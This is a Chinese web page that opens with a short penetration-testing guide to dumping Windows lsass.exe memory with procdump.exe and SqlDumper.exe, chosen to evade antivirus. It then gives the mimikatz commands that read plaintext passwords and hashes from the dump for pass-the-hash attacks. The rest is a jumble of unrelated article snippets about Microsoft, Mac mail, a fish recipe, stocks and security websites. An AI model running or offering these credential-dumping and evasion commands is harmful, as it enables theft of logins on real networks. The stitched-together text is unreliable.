前言
内网渗透时,获得主机管理员权限后,通常会抓取用户的明文密码或hash,进行pth攻击。
大部分情况会遇到防护软件,常规抓取 *** 失效,因此需要对防护进行绕过。
Procdump.exe
Procdump是微软官方发布的工具,使用该工具可以把lsass的内存dump下来,可以绕过大多数的防护软件。
首先使用procdump.exe把进程lsass.exe 的内存dump下来
procdump.exe -accepteula -ma lsass.exe lsass.dmp
实战中把 lsass.dmp 下载下来,在相同版本的操作系统使用mimikatz读取密码hash。
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
SqlDumper.exe
SqlDumper也属于微软出品,存在于SQL Server文件夹中,大多数杀软不会拦截。
默认存放在C:\Program Files\Microsoft SQL Server\number\Shared,number代表SQL Server的版本。
如果目标机器没有安装SQL Server,可以自己上传SqlDumper.exe。
tasklist /svc | findstr lsass.exe 查看lsass.exe 的PID号 Sqldumper.exe ProcessID 0 0x01100 导出mdmp文件
实战中下把生成的mdmp文件下载到本地,使用相同的操作系统打开。
mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" exit
我擦,这是嘛意思啊,微软做不出硬件,终于把发挥自己的软件,现在能把操作系统的普及率做上去才是王道,至于比安卓晚了这么多的微软能不能起来,还是另外一回事儿。 3月18日消息称:微软Windows硬...
此次更新的目的似乎是为了让Mac应用程序与网络和iOS上已有的应用程序保持一致。有新的单行视图用于读取和写入电子邮件,以及新的邮件撰写用户界面和对忽略电子邮件的支持。 其他界面调整包括折叠板,允许您...
很多家庭喜欢吃水煮鱼,不过鱼不麻不辣怎么好吃呢,大家应该很喜欢吃鱼吧,小编为大家推荐一款很好吃的菜:麻辣水煮鱼。 准备食材 主料:草鱼一条(我的2斤)普通辣椒、朝天椒朝天椒可有可无,朝天椒可以增加...
要点导读:小麦财经聊聊长期持有股票会涨回来吗,中航投资600705,降息利好板块,金桥股票【干货】 ??常常听见投资圈朋友说长期持有,其意思就是只要一直持有股票,股票总是会涨起来的,投资者就不会出现...
要点导读:百慕大权证为您讲解股票退市整理期是什么意思,股票000861,百信金融,rsi指标详解,看完就知道了! ??为了在公司终止上市前为投资者设置退出机制,释放相关风险,沪深交易所都推出了退市整...
俗话说得好,最好的防守就是进攻,而这句话同样适用于信息安全领域。接下来,我们将给大家介绍15个最新的网络安全网站。无论你是开发人员、安全专家、审计人员、或者是渗透测试人员,你都可以利用这些网站来提升...